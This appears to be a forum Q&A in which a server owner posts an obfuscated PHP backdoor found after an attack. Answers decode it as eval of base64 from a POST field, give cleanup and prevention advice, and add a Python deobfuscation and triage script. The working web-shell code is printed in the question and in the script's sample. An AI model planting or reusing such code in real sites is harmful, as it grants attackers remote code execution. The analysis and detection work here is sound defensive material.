Trying to decode a virus

My server was recently attacked, and I've been trying to research how and why it is happening.

I have found a very similar pattern in the virus files that looks something like this - as far as I can tell it's trying to run a specific file?

Has anyone seen anything like this, and how should I interpret it? Is it just grabbing individual characters based on the $sF string?

<?php

$sF = "PCT4BA6ODSE_";
// picks characters 4,5,9,10,6,3,11,8,10,1,7,8,10 of $sF: "BASE64_DECODE", lower-cased to "base64_decode"
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
// picks characters 11,0,7,9,2 of $sF: "_POST"; ${"_POST"} is the superglobal, so this is $_POST['nd335c3']
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
  eval($s21($s22)); // executes whatever base64-encoded PHP arrives in that POST field
}
?>
Steven Matthews asked Mar 28 '15 19:03

2 Answers

The variable $s21 is equal to base64_decode and $s22 is equal to $_POST['nd335c3'].

Whenever a POST request is made to your server, it executes whatever command is in $_POST['nd335c3'], which, as you can expect, is very dangerous.

I highly doubt your server was hacked but instead your website script was exploited. Is there anywhere on your site where users can upload files? I've seen a lot of stuff like this with WordPress with poorly coded Plugins.

Fixing The Problem

To fix the problem, first delete this file or the section of code. You may want to shut down your site and put it in maintenance mode until you can search through and verify that all other files have not been modified.

Once the site is back up and running, log the requests made to where the hacked file was located or requests that contain that same POST variable.

Once you have a user who sends data to the exploit, you can check all your other log files and compare them to the same IP address and User agent. This is a far shot but hopefully they use only one computer to do the attack. From the logs you can see what exactly they visited to possibly execute the attack and upload the exploited file.

Preventing This in the Future

  1. Don't install any code you find online onto your site unless you trust the developer and believe it's fully secure and know that they release updates.
  2. Set your web server to not have write access besides to the upload directory and /tmp.
  3. Verify all uploaded files to make sure they are exactly what you expect them to be.
  4. Don't allow PHP to run where files are uploaded to; have the files downloaded as static direct files. This way, if a file has been uploaded that bypasses your file checks, it still can't do any harm.
David answered Sep 20 '22 08:09



Just follow the concatenation code based on the $sF string, and you will see that

$s21 = "base64_decode";
$s22 = "_POST['nd335c3']";

and the rest of the code basically checks if _POST['nd335c3'] exists and, if so, executes the PHP code: base64_decode(_POST['nd335c3']);

What is done next I can't really know, since you didn't display the entire code of the virus.

Hope it helps a bit.

YyYo answered Sep 22 '22 08:09
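As an added example, not from the question or either answer: a small Python script that follows the character picking mechanically, the way both answers describe, so a defender can triage other files that use the same trick. The SAMPLE it parses is a constructed copy of the snippet in the question, and the regexes are assumptions that only understand this one obfuscation style (a literal string, `$var[i] . $var[j]` picks wrapped in strtolower/strtoupper, optionally dereferenced as `${...}['key']`).

```python
import re

# Constructed sample modelled on the snippet in the question; not the real file from the server.
SAMPLE = r'''<?php
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
  eval($s21($s22));
}?>
'''

# $name = "literal";  and  $target = [${][strtolower|strtoupper]( $src[i] . $src[j] ... )[}]['key']
STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
CONCAT_ASSIGN = re.compile(
    r'\$(?P<target>\w+)\s*=\s*(?P<deref>\$\{)?(?P<case>strtolower|strtoupper)?\(?'
    r"(?P<expr>(?:\$\w+\[\d+\]\s*\.?\s*)+)\)?\s*\}?\s*(?:\[\s*'(?P<key>[^']*)'\s*\])?")
INDEX = re.compile(r'\$(\w+)\[(\d+)\]')

def deobfuscate(src):
    """Map each variable built by character picking to the string it really holds."""
    literals = dict(STRING_ASSIGN.findall(src))
    resolved = {}
    for m in CONCAT_ASSIGN.finditer(src):
        chars = []
        for var, idx in INDEX.findall(m.group('expr')):
            text = literals.get(var, '')
            if int(idx) >= len(text):
                break  # picks from a string we never saw: leave this one unresolved
            chars.append(text[int(idx)])
        else:
            value = ''.join(chars)
            value = {'strtolower': str.lower, 'strtoupper': str.upper}.get(m.group('case'), str)(value)
            if m.group('deref'):  # ${"NAME"} is a variable-variable, i.e. $NAME
                value = '$' + value
                if m.group('key') is not None:
                    value += "['%s']" % m.group('key')
            resolved['$' + m.group('target')] = value
    return resolved

DECODERS = {'base64_decode', 'str_rot13', 'gzinflate', 'gzuncompress'}

def findings(src):
    """Human-readable triage lines; flags eval() that is fed by a hidden decoder."""
    names = deobfuscate(src)
    lines = ['%s resolves to %s' % kv for kv in sorted(names.items())]
    if 'eval(' in src and any(v in DECODERS for v in names.values()):
        lines.append('eval() of decoded request data: treat this file as a web shell')
    return lines
```

Run `findings(SAMPLE)` to get the two resolved names plus the web-shell flag; on a file that picks from a string the script never saw, the variable is simply left out of the result rather than guessed.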